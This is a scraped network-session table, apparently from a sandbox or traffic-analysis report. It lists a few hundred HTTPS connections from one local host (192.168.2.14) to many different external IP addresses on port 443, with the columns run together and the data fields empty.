                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24305192.168.2.1455804143.93.41.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24306192.168.2.1440780179.69.18.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24307192.168.2.1438926182.61.216.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24308192.168.2.1459494211.253.139.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24309192.168.2.1448814220.9.176.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24310192.168.2.1456714118.161.197.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24311192.168.2.144568658.205.220.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24312192.168.2.1433062180.128.31.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24313192.168.2.1439568143.6.194.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24314192.168.2.145365085.4.183.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24315192.168.2.1447234150.2.82.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24316192.168.2.1443600190.19.229.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24317192.168.2.1456628219.227.170.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24318192.168.2.1448536207.107.71.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24319192.168.2.144484413.197.169.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24320192.168.2.143424871.7.2.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24321192.168.2.1435226157.235.139.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24322192.168.2.1451512200.107.203.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24323192.168.2.144234045.219.247.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24324192.168.2.1449232123.135.223.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24325192.168.2.145277413.179.201.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24326192.168.2.144589447.245.26.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24327192.168.2.1433768159.67.126.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24328192.168.2.1448402159.44.168.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24329192.168.2.143898061.26.172.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24330192.168.2.143377258.46.108.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24331192.168.2.144639080.138.199.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24332192.168.2.1444550121.112.115.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24333192.168.2.1454034154.53.162.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24334192.168.2.1449956161.99.123.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24335192.168.2.144793839.113.114.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24336192.168.2.1440864173.198.141.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24337192.168.2.145859852.12.74.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24338192.168.2.145877850.245.75.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24339192.168.2.143783252.46.159.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24340192.168.2.144582071.44.145.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24341192.168.2.1443912144.16.81.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24342192.168.2.144263837.139.203.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24343192.168.2.1441410204.245.34.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24344192.168.2.1433266181.40.62.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24345192.168.2.1434940207.238.148.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24346192.168.2.1433404168.162.60.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24347192.168.2.144186871.112.27.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24348192.168.2.1457874176.93.161.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24349192.168.2.1447660164.73.135.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24350192.168.2.1436836148.44.6.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24351192.168.2.1455178168.90.231.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24352192.168.2.1441082178.102.121.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24353192.168.2.144185637.3.2.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24354192.168.2.1448070105.120.207.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24355192.168.2.1433176128.196.37.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24356192.168.2.145993427.130.127.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24357192.168.2.1442068209.12.223.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24358192.168.2.1439872196.128.239.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24359192.168.2.1438806209.167.117.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24360192.168.2.143809276.101.135.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24361192.168.2.1436204175.72.141.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24362192.168.2.1437722131.51.20.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24363192.168.2.14562685.254.192.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24364192.168.2.1451950172.255.33.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24365192.168.2.145202693.206.208.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24366192.168.2.1453430172.170.145.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24367192.168.2.1444392187.68.13.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24368192.168.2.1437114111.43.160.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24369192.168.2.1445606150.211.129.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24370192.168.2.145688076.26.92.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24371192.168.2.145518077.73.242.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24372192.168.2.1449146192.103.225.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24373192.168.2.143523857.19.212.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24374192.168.2.1458306108.20.174.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24375192.168.2.143694660.80.90.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24376192.168.2.1448248195.12.173.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24377192.168.2.145482680.189.2.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24378192.168.2.1448086203.100.95.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24379192.168.2.144428661.138.201.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24380192.168.2.1446576146.243.228.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24381192.168.2.144848066.166.160.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24382192.168.2.1435496132.109.254.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24383192.168.2.1437962201.195.81.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24384192.168.2.144835293.141.95.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24385192.168.2.1456586153.103.102.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24386192.168.2.1434794132.90.180.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24387192.168.2.1447590182.116.112.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24388192.168.2.1439190163.172.135.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24389192.168.2.1452402125.25.192.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24390192.168.2.143437868.45.5.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24391192.168.2.144215280.0.7.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24392192.168.2.143406439.180.152.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24393192.168.2.1443704179.52.184.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24394192.168.2.1453440121.155.64.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24395192.168.2.1447812120.215.234.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24396192.168.2.1434322159.200.136.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24397192.168.2.1453870166.204.7.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24398192.168.2.1443976114.98.128.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24399192.168.2.1447426163.165.126.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24400192.168.2.1449674197.169.144.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24401192.168.2.145262435.98.75.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24402192.168.2.1448240113.235.8.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24403192.168.2.1452664151.222.81.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24404192.168.2.14507428.105.36.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24405192.168.2.1444086192.210.102.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24406192.168.2.1454492117.172.77.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24407192.168.2.1437980197.87.150.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24408192.168.2.1438348212.149.56.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24409192.168.2.1443090208.6.56.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24410192.168.2.1436668108.85.32.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24411192.168.2.1443962170.95.138.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24412192.168.2.143581032.167.82.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24413192.168.2.1436468208.6.133.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24414192.168.2.1450066152.64.120.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24415192.168.2.1444494220.56.192.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24416192.168.2.145786442.220.219.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24417192.168.2.145650417.162.30.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24418192.168.2.1459192184.26.160.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24419192.168.2.14352865.63.155.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24420192.168.2.1433264180.95.77.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24421192.168.2.144902812.232.216.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24422192.168.2.1447722175.133.124.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24423192.168.2.1452608202.51.178.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24424192.168.2.143581078.186.64.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24425192.168.2.145521049.185.25.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24426192.168.2.1446510191.51.122.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24427192.168.2.14577284.99.60.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24428192.168.2.1451498154.70.25.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24429192.168.2.1449218209.75.1.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24430192.168.2.1438862187.60.71.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24431192.168.2.1451752183.76.120.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24432192.168.2.1450522147.80.251.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24433192.168.2.143376288.39.191.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24434192.168.2.1453970173.191.227.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24435192.168.2.1440514100.127.81.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24436192.168.2.1434922207.56.155.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24437192.168.2.14371284.44.175.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24438192.168.2.1436530205.56.190.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24439192.168.2.143411678.30.56.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24440192.168.2.1454218191.192.123.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24441192.168.2.1446496209.10.100.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24442192.168.2.1457918130.218.187.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24443192.168.2.144008266.119.36.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24444192.168.2.144884688.172.116.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24445192.168.2.1443264122.173.186.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24446192.168.2.143858240.48.243.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24447192.168.2.144236825.190.4.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24448192.168.2.14560184.106.65.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24449192.168.2.146073880.106.31.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24450192.168.2.1444062205.124.164.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24451192.168.2.1455280220.131.134.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24452192.168.2.1458310102.192.81.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24453192.168.2.145107881.19.13.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24454192.168.2.1434180108.134.0.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24455192.168.2.1446590222.232.251.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24456192.168.2.145520047.21.158.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24457192.168.2.145258272.218.174.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24458192.168.2.1442324105.56.6.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24459192.168.2.144856424.169.187.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24460192.168.2.1454726204.132.18.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24461192.168.2.146057687.251.109.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24462192.168.2.1448586147.69.176.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24463192.168.2.1434934134.144.67.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24464192.168.2.1448506115.93.156.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24465192.168.2.1457220196.144.199.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24466192.168.2.1458540189.30.52.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24467192.168.2.1459586125.141.35.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24468192.168.2.1459752171.111.57.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24469192.168.2.1458724112.200.43.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24470192.168.2.1443044121.20.10.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24471192.168.2.146058481.87.59.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24472192.168.2.1435422217.62.8.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24473192.168.2.145580618.170.147.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24474192.168.2.1435312166.59.41.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24475192.168.2.1454372123.248.173.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24476192.168.2.143606614.244.255.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24477192.168.2.1444638148.254.110.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24478192.168.2.145744618.231.216.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24479192.168.2.143738460.111.213.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24480192.168.2.1436202189.204.14.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24481192.168.2.145335840.98.120.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24482192.168.2.145459844.165.226.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24483192.168.2.1437264206.195.153.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24484192.168.2.144963461.78.59.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24485192.168.2.1452606216.133.9.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24486192.168.2.143456843.87.190.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24487192.168.2.1443880107.247.163.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24488192.168.2.1439136201.83.36.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24489192.168.2.1440744149.58.218.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24490192.168.2.1447938158.158.192.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24491192.168.2.1455816212.163.15.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24492192.168.2.1455778176.147.233.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24493192.168.2.1453912155.161.164.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24494192.168.2.144405076.206.240.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24495192.168.2.1441304110.230.182.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24496192.168.2.1441926157.2.148.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24497192.168.2.1446260110.180.129.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24498192.168.2.1450072159.143.156.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24499192.168.2.1435594205.5.25.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24500192.168.2.1458936192.129.83.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24501192.168.2.1434740143.221.189.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24502192.168.2.146032885.175.86.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24503192.168.2.1434568203.157.193.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24504192.168.2.1434102155.239.119.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24505192.168.2.145801646.82.126.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24506192.168.2.1449888158.149.110.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24507192.168.2.1454222144.1.211.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24508192.168.2.145821488.44.225.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24509192.168.2.145923244.204.178.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24510192.168.2.1457364193.204.242.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24511192.168.2.1444628128.1.41.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24512192.168.2.144897875.153.84.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24513192.168.2.1452148199.86.79.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24514192.168.2.14560721.56.239.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24515192.168.2.146004478.47.2.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24516192.168.2.1442278131.35.170.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24517192.168.2.1459274154.163.26.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24518192.168.2.1434934197.97.229.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24519192.168.2.1435016189.137.95.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24520192.168.2.1446686166.1.103.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24521192.168.2.1433866118.165.180.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24522192.168.2.143707013.253.9.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24523192.168.2.1451254161.144.100.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24524192.168.2.1458790140.153.113.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24525192.168.2.146009859.137.104.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      24526192.168.2.145360085.45.170.82443
